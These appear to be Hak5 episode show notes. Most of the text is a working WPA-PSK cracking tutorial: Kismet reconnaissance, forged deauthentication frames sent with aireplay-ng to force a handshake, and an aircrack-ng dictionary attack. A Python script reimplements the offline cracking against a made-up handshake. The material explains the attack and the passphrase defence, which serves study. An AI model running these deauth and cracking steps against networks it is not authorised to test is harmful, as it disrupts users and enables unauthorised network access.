Episode 3x06
From Hak5
Synopsis
In this episode of Hak5 Darren uses the eeePC, BackTrack 3, and Aircrack-ng to audit the security of our WPA encrypted wireless access point. Wess reviews Herbie the Mousebot from Solarbotics, a great electronics project for beginners and intermediates. Chris Gerling comes by to show us Rockbox, the open source firmware alternative for your portable media players, as well as a brief tutorial on building your own songs for Frets on Fire. Grab a companion cube and gather ’round for some technolust.
Also, Wizzywig volume 1: Phreak now available. Find out about volume 2: Hacking.
Just for reference the structure for WPA hacking is as follows:
Beginning:
1. Download backtrack 3 from here: http://www.remote-exploit.org/backtrack_download.html
2. Burn BackTrack 3 to a CD
3. Reboot the computer with the CD inserted and make sure it boots from it: either pick the CD from the boot menu or set the CD drive as the first boot device in the BIOS.
4. Once backtrack is loaded, you are ready to get started.
5. Below, there are instructions for the commands to run for WPA Cracking.
Kubuntu 8.04 (+ Other debian distros probably similar):
- Personally I use Kubuntu, and there are a few weird things with it; I personally would recommend using BT3, but I know a lot of users probably have Kubuntu.
1. In Kubuntu, if you haven't already enabled the extra repositories, open the Adept package manager and make sure all sources are enabled.
2. Sometimes Kubuntu doesn't notice that the package sources have changed; open Konsole and run:
sudo apt-get update
Let it run while it refreshes the package lists.
3. We are going to need madwifi drivers, kismet, aircrack-ng, libpcap and a word list.
4. Everything is in the repos except for madwifi which can be obtained here: http://downloads.sourceforge.net/madwifi/madwifi-0.9.4.tar.gz
5. Instructions for setting up madwifi are in the MADWIFI Install section below.
6. Everything else can be installed with aptitude.
7. Run the commands:
sudo aptitude install libpcap0.8
sudo aptitude install kismet
sudo aptitude install aircrack-ng
(airodump-ng and aireplay-ng are part of the aircrack-ng package, so there is nothing separate to install for them; the Debian/Ubuntu package for libpcap is named libpcap0.8.)
8. libpcap is needed because without it Kismet does not capture packets; it is not listed as a dependency because Kismet can run without it, it just isn't as functional.
9. Once Kismet is installed you will need to edit /etc/kismet/kismet.conf
10. Run: sudo kate /etc/kismet/kismet.conf
11. There are lines for suiduser= and source=. Change suiduser to your username; as for source, it depends on your card and driver. In my situation, using the madwifi drivers with an Atheros card, this works: source=madwifi_ag,ath0,madwifi
12. You should be ready to crack; see the section titled WPA Cracking below.
13. I had a few issues in Kubuntu, so it's in no way a simple out-of-the-box configuration. One of the main issues I had was that the Wi-Fi device had to be destroyed rather than stopped before monitor mode could be enabled. This can be done by running:
- sudo wlanconfig ath0 destroy
- sudo wlanconfig ath0 create wlandev wifi0 wlanmode monitor
14. If Kismet plays up, get the latest version's source and compile it; I did, and it seems to work a heap better.
15. Seriously, use BT3; it's heaps easier, and you won't be screwing around so much.
MADWIFI Install (from source, not needed in BT3)
1. Download the file (link above)
2. In Konsole, navigate to the directory you downloaded the file to
3. Run the command: tar -zxvf madwifi-0.9.4.tar.gz
4. cd into the newly created madwifi directory (cd madwifi-0.9.4)
5. Make sure the header package for your running kernel is installed; madwifi is a kernel module and builds against it
6. Run make (madwifi 0.9.4 has no configure script; its Makefile detects the running kernel itself)
7. Run sudo make install (it writes into /lib/modules, so it needs root)
8. If there are no errors, madwifi is installed. If there are errors, note the exact message and search for it.
WPA Cracking:
As explained in the episode by Darren, we start by running Kismet:
- kismet
1. In Kismet, press h for a list of everything you can do in the current screen. For example, on the network list press s (sort) followed by Q to sort networks by signal power (remember Linux is CASE SENSITIVE: Q means Q, not q).
2. Press Enter on any network to see its details.
3. The info you want is the BSSID, the channel, and the Encrypt field. The attack below needs a pre-shared-key network: WPA-PSK with TKIP as in the episode, or WPA2-PSK with CCMP, which uses the same four-way handshake. WPA-Enterprise (802.1X) networks have no shared passphrase to recover this way. Press c to list any recognised clients on the network; you will need one that is actually associated.
4. Record the BSSID, a client MAC address and the channel in a text file or somewhere you can go back to.
5. Exit Kismet by pressing Q on the main page.
6. Back at the command line, put your card into monitor mode (prefix the commands with sudo on Kubuntu; BT3 runs as root):
- airmon-ng stop ath0 <----- stops the managed interface
- airmon-ng start wifi0 <channel> <---- creates a monitor-mode interface (ath0 on madwifi) locked to the AP's channel
7. Next, use airodump-ng to write the capture to a file and watch for the handshake while we deauthenticate a client.
8. The command is:
- airodump-ng -c <channel> --bssid <AP MAC address> -w psk ath0 <---- the command was explained on the show
-c keeps the card on the AP's channel (a channel-hopping card will miss handshake frames), --bssid shows only that AP, and -w psk writes capture files named psk-01.cap, psk-02.cap and so on.
9. Any clients detected are listed in the lower part of the airodump-ng screen.
10. In a separate terminal, deauthenticate a client with the following command:
- aireplay-ng -0 15 -a <AP MAC address> -c <CLIENT MAC address> ath0
^ This sends 15 rounds of deauthentication frames. Deauth frames, as explained by Darren, tell the client that its association with the network has ended, so most clients simply reconnect, and the reconnect produces a fresh four-way handshake that airodump-ng records. It works because 802.11 management frames are neither encrypted nor authenticated in WPA/WPA2 (without 802.11w), so anyone can forge one with the AP's MAC as the source. Remember, proximity to the client has a lot to do with a successful deauth: your card must reach the client, and you must hear both the client's and the AP's handshake frames.
11. Back in the airodump-ng screen, once a client has disconnected and reconnected, WPA handshake: <BSSID> appears in the top right corner.
12. You are nearly there now. The final command is:
- aircrack-ng -w word.lst -b <AP MAC address> psk*.cap
13. To break that command down: when running airodump-ng we saved the capture files with the prefix psk, so psk*.cap tells aircrack-ng to read every file whose name starts with psk and ends in .cap (* is a shell wildcard matching any sequence of characters). word.lst is the wordlist of candidate passphrases, and -b is the BSSID of the AP you are attacking.
14. aircrack-ng takes each word in the list, derives the pairwise master key from it and the SSID (PBKDF2-HMAC-SHA1 with 4096 iterations, which is what makes each guess slow), derives the session keys from that plus the MAC addresses and nonces in the handshake, and checks whether the resulting MIC matches the one in the captured handshake. Only the real passphrase reproduces the MIC; when aircrack-ng finds it, it prints KEY FOUND! and exits. Nothing is sent to the network during this step: it is an entirely offline attack on the capture file, so the only defence is a passphrase that is not in any wordlist, i.e. long and random.
15. If you've found the key, congratulations, you have successfully recovered the WPA-PSK passphrase. If the passphrase isn't in your wordlist, the attack simply fails; there is no shortcut around the dictionary.
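What aircrack-ng does in step 14, written out as an added Python example for these show notes (it is not Hak5's code and not aircrack-ng's source): derive the PMK from each candidate passphrase and the SSID, expand it to the PTK with the MAC addresses and nonces from the handshake, and test the candidate by recomputing the MIC on EAPOL-Key message 2. The handshake it attacks is constructed inline: the SSID "IEEE", the AP and client MACs, the nonces and the EAPOL frame are all made up here rather than read from a psk-01.cap, and the PBKDF2 stage can be checked against the IEEE 802.11i test vector (passphrase "password", SSID "IEEE").

```python
"""Offline WPA/WPA2-PSK dictionary attack against a captured four-way handshake.

Added example; not Hak5's or aircrack-ng's code. The "captured" handshake is
constructed below with made-up MAC addresses, nonces and EAPOL frame.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional

# Byte offset of the 16-byte Key MIC field inside an EAPOL-Key frame:
# 4-byte EAPOL header + descriptor type(1) + key info(2) + key length(2)
# + replay counter(8) + nonce(32) + IV(16) + RSC(8) + key ID(8) = 81.
MIC_OFFSET = 81
MIC_LEN = 16


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise master key: PBKDF2-HMAC-SHA1 salted with the SSID, 4096 rounds, 32 bytes.
    The 4096 iterations are what make each dictionary guess relatively expensive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise transient key via the 802.11i PRF-512.
    Everything here except the PMK is visible in the captured handshake."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):  # 4 x 160 bits >= 512 bits
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, frame_mic_zeroed: bytes, key_version: int) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed.
    Key descriptor version 1 (WPA/TKIP, as in the episode) uses HMAC-MD5,
    version 2 (WPA2/CCMP) uses HMAC-SHA1; both are truncated to 16 bytes."""
    algo = hashlib.md5 if key_version == 1 else hashlib.sha1
    return hmac.new(kck, frame_mic_zeroed, algo).digest()[:MIC_LEN]


@dataclass
class Handshake:
    ssid: str
    ap_mac: bytes
    client_mac: bytes
    anonce: bytes       # from message 1 (AP -> client)
    snonce: bytes       # from message 2 (client -> AP)
    eapol_msg2: bytes   # full EAPOL-Key message 2, MIC field intact
    key_version: int


def crack_psk(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Return the passphrase from wordlist that reproduces the captured MIC, else None."""
    observed = hs.eapol_msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    zeroed = hs.eapol_msg2[:MIC_OFFSET] + bytes(MIC_LEN) + hs.eapol_msg2[MIC_OFFSET + MIC_LEN:]
    for candidate in wordlist:
        kck = wpa_ptk(wpa_pmk(candidate, hs.ssid), hs.ap_mac, hs.client_mac,
                      hs.anonce, hs.snonce)[:16]  # KCK = first 128 bits of the PTK
        if hmac.compare_digest(eapol_mic(kck, zeroed, hs.key_version), observed):
            return candidate
    return None


def build_constructed_handshake(passphrase: str, ssid: str = "IEEE") -> Handshake:
    """Constructed stand-in for the handshake in psk-01.cap: made-up MACs and nonces,
    and a minimal EAPOL-Key message 2 whose MIC is computed from `passphrase`."""
    ap_mac = bytes.fromhex("001122334455")      # assumed AP BSSID (made up)
    client_mac = bytes.fromhex("66778899aabb")  # assumed client MAC (made up)
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))  # made-up nonces
    key_version = 1                              # WPA/TKIP
    key_info = (0x0100 | 0x0008 | key_version).to_bytes(2, "big")  # MIC set, pairwise, version
    body = (b"\xfe" + key_info + (32).to_bytes(2, "big") + (1).to_bytes(8, "big")
            + snonce + bytes(16) + bytes(8) + bytes(8) + bytes(MIC_LEN) + (0).to_bytes(2, "big"))
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type 3 = EAPOL-Key
    kck = wpa_ptk(wpa_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, frame, key_version)
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + MIC_LEN:]
    return Handshake(ssid, ap_mac, client_mac, anonce, snonce, frame, key_version)


if __name__ == "__main__":
    hs = build_constructed_handshake("password")
    print(crack_psk(hs, ["letmein", "qwerty123", "password", "hunter2"]))  # password
```

The whole attack runs on the bytes in the capture; the AP is never contacted. The only per-guess cost is the 4096-round PBKDF2 in wpa_pmk, which is what limits how many candidates per second a machine like the eeePC can test, and why a passphrase that is not in anyone's wordlist cannot be recovered this way.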


